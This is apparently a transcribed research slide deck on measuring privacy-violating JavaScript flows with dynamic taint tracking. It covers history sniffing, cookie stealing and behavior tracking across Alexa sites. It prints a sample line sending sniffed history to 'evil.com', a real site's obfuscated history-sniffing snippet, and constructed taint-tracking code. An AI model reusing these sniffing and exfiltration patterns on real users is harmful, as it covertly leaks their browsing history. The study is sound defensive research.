An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham UC San Diego

Page 1:

An Empirical Study of Privacy-Violating Information Flows
In JavaScript Web Applications

Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham
UC San Diego

Pages 2-3:

document.location
✗ Location Hijacking
Phishing

Pages 4-5:

document.cookie
✗ Cookie Stealing
Identity Theft

Pages 6-7:

✗ History Sniffing
JavaScript → Visited / Not-Visited

Pages 8-10:

"See absolutely everything visitors do on your webpage. …"

✗ Behavior Tracking

Page 11:

Plenty of Mischief Possible!

Page 12:

How Prevalent Are Malicious Flows?
How to Detect Malicious Flows?

Page 13:

Outline: Motivation, Flow Policies, Dynamic Flow Tracking, Flows in the Wild, Conclusions

Page 14:

Flow Policies
Specify different types of flows

Page 15:

Policies: History Sniffing

1. Create an (invisible) link to a.com; its color depends on history
2. Inspect the link's color style property; the color says if the link was visited
3. Send the sniffed info over the network

Page 16:

Policies: History Sniffing

    link = createLink("facebook.com");
    style = doc.getStyle(link);
    visited = style.color == "purple";
    send("evil.com", "facebook=" + visited);

Pages 17-19:

Policies: History Sniffing

Inject taints (at confidential sources), propagate taints (at assignments, etc.), block taints (at untrusted sinks):

    link = createLink("facebook.com");
    style = doc.getStyle(link);                // inject: style is tainted at the source
    visited = style.color == "purple";         // propagate: the taint flows through the comparison
    send("evil.com", "facebook=" + visited);   // block: a tainted value reaches the untrusted sink

Pages 20-24:

Flow Policies: Inject / Block

Inject:
    at doc.getStyle($1) if isLink($1) inject "secret"
Taint style with "secret"

Block:
    at send($1, $2) block "secret" on $2
Block tainted values to third-party

Rule forms:
    at Site if Cond inject Taint
    at Site block Taint on Param

Page 25:

Flow Policies: Expressive

History Sniffing
Behavior Tracking
Cookie Stealing
Location Hijacking
…

Page 26:

Outline: Motivation, Flow Policies, Dynamic Flow Tracking, Flows in the Wild, Conclusions

Pages 27-31:

Dynamic Flow Tracking: Rewrite JS code to carry taints

    Source code → Parse → AST → Rewrite → AST → Execute
    (Dynamic Eval: code produced at runtime is fed back into Parse)

[Chander et al., POPL 07]

Rewritten Code: add .taint fields; inject, propagate, block taints

Rewriting Issues: Boxing / Unboxing; Indirect Flows

Implemented in Chrome/V8

Page 32:

Dynamic Flow Tracking: Performance (Overhead)

Page 33:

Performance: Policies

Cookie Confidentiality: cookie doesn't flow to 3rd party code
Location Integrity: location unaffected by 3rd party code

Page 34:

Performance: Benchmark

10 sites with the largest JS code base in Alexa top 100
15 – 31 Kloc (avg. 21 Kloc)

Page 35:

Performance: Figures

Timing Overheads: Page load (avg: 2x), JS execution (avg: 3x)

Page 36:

Performance: Upshot

High for online use
Acceptable for offline survey

Page 37:

Outline: Motivation, Flow Policies, Dynamic Flow Tracking, Flows in the Wild, Conclusions

Page 38:

Flows "In the Wild"

History Sniffing
Behavior Tracking

Page 39:

History Sniffing: Figures

Alexa Top 50,000 sites
63 sites reported as sending history over network
1 site in Alexa Top 100
46 sites were real cases

Page 40:

History Sniffing: Example (1 site in Alexa Top 100)

    // Encrypted URLs: every character is shifted up by one ("qpsoivc/dpn" is "pornhub.com")
    var k = {0:"qpsoivc/dpn", 1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn" /* ... */};
    var g = [];
    for (var m in k) {
        var d = k[m];
        // Decrypt URL: shift each character code back down by one
        var a = "";
        for (var f = 0; f < d.length; f++) a += String.fromCharCode(d.charCodeAt(f) - 1);
        var h = false;
        for (var j in { "http://": "", "http://www.": "" }) {
            // Create Link: append an anchor for the decoded URL to the hidden container
            var l = document.createElement("a");
            l.href = j + a;
            document.getElementById("ol").appendChild(l);
            // Inspect Color: the page's :visited rule gives visited links this color
            var e = document.getComputedStyle(l).getPropertyValue("color");
            if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true; }
        }
        if (h) { g.push(m); }   // record the index of every visited URL
    }

Pages 41-45:

History Sniffing: Real Cases

    Rank  Site           Desc     Src          Inspected URLs
    61    youporn        adult    youporn      pornhub, tube8, +21
    867   charter.net    news     interclick   cars, edmunds, +46
    2333  feedjit        traffic  feedjit      twitter, facebook, +6
    2415  gamestorrents  game     meaningtool  amazon, ebay, +220
    2811  newsmax        news     interclick   cars, edmunds, +46
    3508  namepros       forum    feedjit      twitter, facebook, +6
    3603  fulltono       music    meaningtool  amazon, ebay, +220
    4266  youporngay     adult    youporngay   pornhub, tube8, +21
    4581  osdir          tech     interclick   cars, edmunds, +46
    5233  gamesfreak     game     interclick   cars, edmunds, +46

+ 36 more cases…

Highlighted on the build slides:
charter.net → doubleclick.net → interclick
gamestorrents → harrenmedianetwork → meaningtool

Page 46:

History Sniffing: Upshot

# of sniffed URLs: 8 to 220
Of 46 real cases: 39 had third-party sniffing code, 7 had home-grown code
Obfuscated sniffing code; code was generated at runtime

Page 47:

Malicious Flows "In the Wild"

History Hijacking
Behavior Tracking

Page 48:

Behavior Tracking

Log user behavior by JS event handlers
Send log back to website

Pages 49-50:

Behavior Tracking: Policy

    while (1) {
        e = getEvent();
        if (e.isMouseOver()) onMouseOver(e);
        if (e.isClick()) onClick(e);
        ...
    }
    onMouseOver = function(event) { isMouseOver = true; }

    at $1.isMouseOver() inject "secret"
    at $1.isClick() inject "secret"
    …

(The slides highlight the literal true stored by the handler and the e.isMouseOver() call that the policy taints.)
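The inject/propagate/block mechanism of Pages 17-24 and the event-handler policy of Pages 49-50, as an added example that models the tracking in plain JavaScript; it is not the authors' V8 rewriting, and the box/op/at helpers, the createLink/getStyle/send stand-ins and the visited set are constructed for the example.

```javascript
// Constructed model of inject/propagate/block taint tracking, not the authors'
// V8 rewriting: every value is boxed with a .taint set (assumed names).
const box = (v, taints = []) =>
  v && v.taint instanceof Set ? v : { value: v, taint: new Set(taints) };
const val = (v) => box(v).value;
// Propagate: an operation's result carries the union of its operands' taints.
const op = (fn, ...args) =>
  box(fn(...args.map(val)), args.flatMap((a) => [...box(a).taint]));
// Policy rules in the slides' form "at Site if Cond inject Taint" and
// "at Site block Taint on Param".
const policy = {
  inject: [
    { site: "doc.getStyle", cond: ([lnk]) => val(lnk).isLink, taint: "secret" },
    { site: "isMouseOver", cond: () => true, taint: "secret" },
    { site: "isClick", cond: () => true, taint: "secret" },
  ],
  block: [{ site: "send", taint: "secret", param: 1 }],
};
// Instrumented call site: check block rules, run the operation, then inject.
function at(site, fn, ...args) {
  const hit = policy.block.find((r) =>
    r.site === site && box(args[r.param]).taint.has(r.taint));
  if (hit) return { blocked: true, site, taint: hit.taint };
  const out = op(fn, ...args);
  for (const r of policy.inject)
    if (r.site === site && r.cond(args)) out.taint.add(r.taint);
  return out;
}
// Constructed stand-ins for the browser; the visited set is fake history.
const visitedSites = new Set(["facebook.com"]);
const env = {
  createLink: (url) => ({ isLink: true, url }),
  getStyle: (lnk) => ({ color: visitedSites.has(lnk.url) ? "purple" : "blue" }),
  send: (host, data) => host + " <- " + data,
};
// Pages 16-19: the sniffed bit is tainted at getStyle and blocked at send.
function historySniff() {
  const link = env.createLink("facebook.com");
  const style = at("doc.getStyle", env.getStyle, link);            // inject
  const visited = op((s) => s.color == "purple", style);           // propagate
  return at("send", env.send, "evil.com", op((v) => "facebook=" + v, visited));
}
// Pages 49-50: whatever is derived from e.isMouseOver() is secret as well.
function behaviorTrack(e) {
  const isOver = at("isMouseOver", (ev) => ev.type === "mouseover", e);
  return at("send", env.send, "tracker.example", isOver);
}
// Untainted data still reaches the sink: the policy blocks flows, not sends.
function benignSend() { return at("send", env.send, "evil.com", "page=home"); }
```

Both privacy-violating flows end in a block record at the send sink, while the untainted send passes with an empty taint set.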

Page 51:

Behavior Tracking: Figures

Alexa Top 1300 sites
328 sites sent behavior
115 sites sent behavior covertly
10 sampled for manual inspection
7 manually reconstructed flow

Automatically trigger JS event handlers
Many user-visible (image swapping)

Covert Filter: response < 100 bytes

Pages 52-54:

Behavior Tracking: Real Cases

    Rank  Site         Desc      Events
    3     youtube      media     click
    11    yahoo.co.jp  portal    click
    15    sina.com.cn  portal    click
    19    microsoft    software  click, mouseover
    34    mail.ru      email     click
    53    soso         search    click
    65    about        search    click

Highlighted on the build slides: webtrends.com

Page 55:

Outline: Motivation, Flow Policies, Dynamic Flow Tracking, Flows in the Wild, Conclusions

Page 56:

Conclusions

Flows Occur In The Wild: real cases for further study
Dynamic Approach is Required: obfuscated & dynamically generated

Page 57:

Future work

Larger Scale Study on Flows: deeper crawl & other types of flow
Bullet-proof Protection Tool: policy enforcement without much slowdown & many false alarms

Page 58:

Thank you!